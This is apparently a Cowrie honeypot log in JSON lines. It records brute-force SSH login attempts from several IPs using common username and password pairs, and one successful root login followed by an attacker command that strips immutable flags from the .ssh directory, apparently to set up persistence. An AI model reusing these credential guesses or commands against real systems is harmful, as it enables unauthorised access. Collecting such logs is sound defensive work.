{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62706,"dst_ip":"1.2.3.4","dst_port":22,"session":"46e2a23352a5","protocol":"ssh","message":"New connection: 212.227.125.160:62706 (1.2.3.4:22) [session: 46e2a23352a5]","sensor":"my-vps","timestamp":"2025-09-08T12:45:38.038086Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-09-08T12:45:38.039837Z","src_ip":"212.227.125.160","session":"46e2a23352a5"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:45:38.040704Z","src_ip":"212.227.125.160","session":"46e2a23352a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62716,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad1e9b7ec51f","protocol":"ssh","message":"New connection: 212.227.125.160:62716 (1.2.3.4:22) [session: ad1e9b7ec51f]","sensor":"my-vps","timestamp":"2025-09-08T12:45:38.234566Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xec1e\\xf1}Wl\\xf9\u4d97\\xe6\u0011\\xee\\xde\u0002J\\x8d|\\x9eNd#\\x81\\xddS*\u001f\\xc2\\xecd`\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xec1e\\xf1}Wl\\xf9\u4d97\\xe6\u0011\\xee\\xde\u0002J\\x8d|\\x9eNd#\\x81\\xddS*\u001f\\xc2\\xecd`\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-09-08T12:45:38.235512Z","src_ip":"212.227.125.160","session":"ad1e9b7ec51f"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:45:38.236862Z","src_ip":"212.227.125.160","session":"ad1e9b7ec51f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34547,"dst_ip":"1.2.3.4","dst_port":23,"session":"6e571d3aa4e0","protocol":"telnet","message":"New connection: 212.227.235.229:34547 (1.2.3.4:23) [session: 6e571d3aa4e0]","sensor":"my-vps","timestamp":"2025-09-08T12:45:44.575612Z"}
{"eventid":"cowrie.session.closed","duration":13.074913024902344,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:45:57.650453Z","src_ip":"212.227.235.229","session":"6e571d3aa4e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48344,"dst_ip":"1.2.3.4","dst_port":22,"session":"50411394e2a1","protocol":"ssh","message":"New connection: 212.227.235.229:48344 (1.2.3.4:22) [session: 50411394e2a1]","sensor":"my-vps","timestamp":"2025-09-08T12:45:59.625052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:45:59.626016Z","src_ip":"212.227.235.229","session":"50411394e2a1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:45:59.893750Z","src_ip":"212.227.235.229","session":"50411394e2a1"}
{"eventid":"cowrie.login.failed","username":"david","password":"Password123","message":"login attempt [david/Password123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:46:01.007905Z","src_ip":"212.227.235.229","session":"50411394e2a1"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:46:02.313577Z","src_ip":"212.227.235.229","session":"50411394e2a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51690,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd9555600dee","protocol":"ssh","message":"New connection: 212.227.235.229:51690 (1.2.3.4:22) [session: fd9555600dee]","sensor":"my-vps","timestamp":"2025-09-08T12:46:08.616867Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:46:08.618171Z","src_ip":"212.227.235.229","session":"fd9555600dee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:46:08.746749Z","src_ip":"212.227.235.229","session":"fd9555600dee"}
{"eventid":"cowrie.login.failed","username":"lenovo","password":"lenovo","message":"login attempt [lenovo/lenovo] failed","sensor":"my-vps","timestamp":"2025-09-08T12:46:09.300277Z","src_ip":"212.227.235.229","session":"fd9555600dee"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:46:10.431520Z","src_ip":"212.227.235.229","session":"fd9555600dee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34606,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f71ede9e131","protocol":"ssh","message":"New connection: 212.227.235.229:34606 (1.2.3.4:22) [session: 8f71ede9e131]","sensor":"my-vps","timestamp":"2025-09-08T12:46:12.717107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:46:12.718129Z","src_ip":"212.227.235.229","session":"8f71ede9e131"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:46:13.011524Z","src_ip":"212.227.235.229","session":"8f71ede9e131"}
{"eventid":"cowrie.login.failed","username":"superman","password":"password123","message":"login attempt [superman/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:46:14.232141Z","src_ip":"212.227.235.229","session":"8f71ede9e131"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:46:15.526557Z","src_ip":"212.227.235.229","session":"8f71ede9e131"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":34658,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ce528abea90","protocol":"ssh","message":"New connection: 139.59.14.27:34658 (1.2.3.4:22) [session: 1ce528abea90]","sensor":"my-vps","timestamp":"2025-09-08T12:46:16.891914Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:46:16.892957Z","src_ip":"139.59.14.27","session":"1ce528abea90"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:46:17.220527Z","src_ip":"139.59.14.27","session":"1ce528abea90"}
{"eventid":"cowrie.login.failed","username":"db2admin","password":"db2admin1234","message":"login attempt [db2admin/db2admin1234] failed","sensor":"my-vps","timestamp":"2025-09-08T12:46:18.555988Z","src_ip":"139.59.14.27","session":"1ce528abea90"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:46:19.891259Z","src_ip":"139.59.14.27","session":"1ce528abea90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38198,"dst_ip":"1.2.3.4","dst_port":22,"session":"a34e7746567f","protocol":"ssh","message":"New connection: 212.227.235.229:38198 (1.2.3.4:22) [session: a34e7746567f]","sensor":"my-vps","timestamp":"2025-09-08T12:46:52.138652Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:46:52.139665Z","src_ip":"212.227.235.229","session":"a34e7746567f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:46:52.312546Z","src_ip":"212.227.235.229","session":"a34e7746567f"}
{"eventid":"cowrie.login.failed","username":"superman","password":"password123","message":"login attempt [superman/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:46:53.046760Z","src_ip":"212.227.235.229","session":"a34e7746567f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:46:54.223452Z","src_ip":"212.227.235.229","session":"a34e7746567f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54514,"dst_ip":"1.2.3.4","dst_port":22,"session":"485efcdd32b6","protocol":"ssh","message":"New connection: 212.227.235.229:54514 (1.2.3.4:22) [session: 485efcdd32b6]","sensor":"my-vps","timestamp":"2025-09-08T12:47:06.893384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:47:06.895676Z","src_ip":"212.227.235.229","session":"485efcdd32b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:47:07.189869Z","src_ip":"212.227.235.229","session":"485efcdd32b6"}
{"eventid":"cowrie.login.failed","username":"lsfadmin","password":"0","message":"login attempt [lsfadmin/0] failed","sensor":"my-vps","timestamp":"2025-09-08T12:47:08.369328Z","src_ip":"212.227.235.229","session":"485efcdd32b6"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:47:09.669871Z","src_ip":"212.227.235.229","session":"485efcdd32b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49452,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca11d57bfa2d","protocol":"ssh","message":"New connection: 212.227.235.229:49452 (1.2.3.4:22) [session: ca11d57bfa2d]","sensor":"my-vps","timestamp":"2025-09-08T12:47:13.671997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:47:13.672977Z","src_ip":"212.227.235.229","session":"ca11d57bfa2d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:47:13.797979Z","src_ip":"212.227.235.229","session":"ca11d57bfa2d"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"password","message":"login attempt [odoo/password] failed","sensor":"my-vps","timestamp":"2025-09-08T12:47:14.337403Z","src_ip":"212.227.235.229","session":"ca11d57bfa2d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:47:15.465067Z","src_ip":"212.227.235.229","session":"ca11d57bfa2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60976,"dst_ip":"1.2.3.4","dst_port":22,"session":"f62bec0ab74a","protocol":"ssh","message":"New connection: 212.227.235.229:60976 (1.2.3.4:22) [session: f62bec0ab74a]","sensor":"my-vps","timestamp":"2025-09-08T12:47:17.046836Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:47:17.047542Z","src_ip":"212.227.235.229","session":"f62bec0ab74a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:47:17.306847Z","src_ip":"212.227.235.229","session":"f62bec0ab74a"}
{"eventid":"cowrie.login.failed","username":"hack","password":"pass","message":"login attempt [hack/pass] failed","sensor":"my-vps","timestamp":"2025-09-08T12:47:18.454381Z","src_ip":"212.227.235.229","session":"f62bec0ab74a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:47:19.717047Z","src_ip":"212.227.235.229","session":"f62bec0ab74a"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":44976,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c1f6c884e7c","protocol":"ssh","message":"New connection: 134.199.174.250:44976 (1.2.3.4:22) [session: 6c1f6c884e7c]","sensor":"my-vps","timestamp":"2025-09-08T12:47:34.851306Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:47:35.155751Z","src_ip":"134.199.174.250","session":"6c1f6c884e7c"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":38046,"dst_ip":"1.2.3.4","dst_port":22,"session":"3932621ea193","protocol":"ssh","message":"New connection: 139.59.14.27:38046 (1.2.3.4:22) [session: 3932621ea193]","sensor":"my-vps","timestamp":"2025-09-08T12:47:36.429767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:47:36.430614Z","src_ip":"139.59.14.27","session":"3932621ea193"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:47:36.817569Z","src_ip":"139.59.14.27","session":"3932621ea193"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc@123456","message":"login attempt [root/Abc@123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:47:38.363204Z","src_ip":"139.59.14.27","session":"3932621ea193"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:47:39.101614Z","src_ip":"139.59.14.27","session":"3932621ea193"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:47:39.102290Z","src_ip":"139.59.14.27","session":"3932621ea193"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:47:39.103294Z","src_ip":"139.59.14.27","session":"3932621ea193"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:47:39.472907Z","src_ip":"139.59.14.27","session":"3932621ea193"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:47:40.341175Z","src_ip":"139.59.14.27","session":"3932621ea193"}
